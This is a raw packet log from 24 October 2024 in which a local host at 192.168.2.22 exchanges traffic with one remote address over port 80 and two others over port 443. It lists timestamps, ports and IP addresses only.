Oct 24, 2024 21:22:54.806231976 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.806267023 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.806302071 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.806349993 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.806421041 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.806446075 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.806487083 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.806504965 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.806525946 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.806587934 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.884269953 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.884304047 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.884332895 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.884362936 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.884907961 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.884960890 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.884964943 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.884998083 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.885015011 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.885051012 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.885051966 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.885107994 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.885175943 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.885231972 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.885236979 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.885292053 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.885334969 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.885385036 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.885386944 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.885437965 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.885442019 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.885507107 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.885843992 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.885900974 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.885917902 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.885951996 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.885976076 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.885996103 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.925417900 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.925461054 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.925519943 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.925556898 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.925592899 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.925637960 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.925637960 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.925637960 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.925637960 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.925815105 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.925869942 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.925877094 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.925904989 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:54.925921917 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:54.925951004 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:55.003663063 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:55.003809929 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:55.003812075 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:55.003843069 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:55.003876925 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:55.003911972 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:55.003956079 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:55.003979921 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:55.003979921 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:55.003979921 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:55.003979921 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:55.004046917 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:55.004333019 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:55.004369974 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:55.004427910 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:55.004427910 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:22:59.064999104 CEST	80	49167	192.3.176.141	192.168.2.22
Oct 24, 2024 21:22:59.065169096 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:00.637433052 CEST	49168	443	192.168.2.22	142.250.186.46
Oct 24, 2024 21:23:00.637479067 CEST	443	49168	142.250.186.46	192.168.2.22
Oct 24, 2024 21:23:00.637658119 CEST	49168	443	192.168.2.22	142.250.186.46
Oct 24, 2024 21:23:00.642102003 CEST	49168	443	192.168.2.22	142.250.186.46
Oct 24, 2024 21:23:00.642122984 CEST	443	49168	142.250.186.46	192.168.2.22
Oct 24, 2024 21:23:01.495079994 CEST	443	49168	142.250.186.46	192.168.2.22
Oct 24, 2024 21:23:01.495142937 CEST	49168	443	192.168.2.22	142.250.186.46
Oct 24, 2024 21:23:01.495748997 CEST	443	49168	142.250.186.46	192.168.2.22
Oct 24, 2024 21:23:01.495799065 CEST	49168	443	192.168.2.22	142.250.186.46
Oct 24, 2024 21:23:01.500056982 CEST	49168	443	192.168.2.22	142.250.186.46
Oct 24, 2024 21:23:01.500076056 CEST	443	49168	142.250.186.46	192.168.2.22
Oct 24, 2024 21:23:01.500345945 CEST	443	49168	142.250.186.46	192.168.2.22
Oct 24, 2024 21:23:01.548432112 CEST	49168	443	192.168.2.22	142.250.186.46
Oct 24, 2024 21:23:01.591335058 CEST	443	49168	142.250.186.46	192.168.2.22
Oct 24, 2024 21:23:01.914143085 CEST	443	49168	142.250.186.46	192.168.2.22
Oct 24, 2024 21:23:02.035006046 CEST	443	49168	142.250.186.46	192.168.2.22
Oct 24, 2024 21:23:02.035093069 CEST	49168	443	192.168.2.22	142.250.186.46
Oct 24, 2024 21:23:02.039201021 CEST	49168	443	192.168.2.22	142.250.186.46
Oct 24, 2024 21:23:02.056210995 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:02.056293011 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:02.056740999 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:02.057085037 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:02.057118893 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:03.109625101 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:03.109700918 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:03.114928961 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:03.114959955 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:03.115220070 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:03.123399019 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:03.171348095 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:03.927205086 CEST	49167	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:06.097733974 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.097789049 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.097816944 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.097893953 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.097940922 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.127578020 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.127625942 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.127639055 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.127664089 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.127717972 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.127809048 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.174740076 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.174796104 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.174814939 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.178214073 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.178277969 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.178293943 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.186017990 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.186041117 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.186089993 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.186106920 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.186156988 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.248928070 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.249066114 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.249094009 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.249126911 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.249155998 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.249207973 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.304182053 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.308192968 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.308234930 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.308273077 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.308291912 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.308353901 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.315542936 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.366003036 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.366071939 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.366090059 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.371396065 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.371462107 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.371467113 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.371480942 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.371535063 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.371550083 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.427725077 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.427823067 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.427843094 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.431561947 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.431631088 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.431647062 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.441927910 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.442001104 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.442014933 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.492872953 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.492901087 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.492961884 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.492980003 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.493040085 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.493129969 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.533215046 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.533287048 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.533327103 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.553323984 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.553405046 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.553441048 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.556313038 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.556387901 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.556405067 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.567676067 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.567749023 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.567764044 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.612833977 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.612859964 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.612898111 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.612919092 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.612961054 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.613260031 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.676332951 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.676397085 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.676413059 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.676439047 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.676487923 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.678977966 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.689630985 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.689667940 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.689678907 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.689693928 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.689745903 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.704848051 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.735239983 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.735290051 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.735342979 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.735358000 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.735373974 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.735405922 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.735421896 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.735471964 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.735486984 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.797357082 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.797446966 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.797465086 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.798500061 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.798588037 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.798600912 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.809741974 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.809873104 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.809880972 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.877657890 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.877710104 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.877744913 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.877758026 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.877785921 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.877793074 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.878053904 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.878093004 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.878108025 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.878117085 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.878161907 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.916831970 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.918499947 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.918550014 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.918561935 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.918577909 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.918626070 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.929742098 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.974150896 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.974214077 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.974215984 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.974230051 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.974282026 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.997473955 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.997680902 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.997724056 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.997757912 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.997773886 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.997837067 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.997849941 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.997972012 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:06.998024940 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:06.998037100 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.039268970 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.039323092 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.039360046 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.039381027 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.039443016 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.051172018 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.096236944 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.096319914 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.096338987 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.096357107 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.096425056 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.122158051 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.122303009 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.122347116 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.122375965 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.122384071 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.122397900 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.122436047 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.123295069 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.123353958 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.123368025 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.162815094 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.162848949 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.162899017 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.162914991 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.162960052 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.172049046 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.172137022 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.172187090 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.172200918 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.216403961 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.216438055 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.216540098 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.216573000 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.216625929 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.242609978 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.242671967 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.242727041 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.242741108 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.243206978 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.243238926 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.243268013 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.243278027 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.243329048 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.282517910 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.292030096 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.292073965 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.292078972 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.292093992 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.292139053 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.292151928 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.335174084 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.335294008 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.335304022 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.336270094 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.336327076 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.336334944 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.365850925 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.365914106 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.365957022 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.365989923 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.366004944 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.366048098 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.366183996 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.366236925 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.366274118 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.366287947 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.366345882 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.403165102 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.412708044 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.412746906 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.412791967 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.412805080 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.412820101 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.412851095 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.458607912 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.458693027 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.458713055 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.460031986 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.460083961 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.460098028 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.487588882 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.487628937 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.487653017 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.487667084 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.487724066 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.487735987 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.488122940 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.488181114 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.488194942 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.523535967 CEST	443	49169	172.217.16.193	192.168.2.22
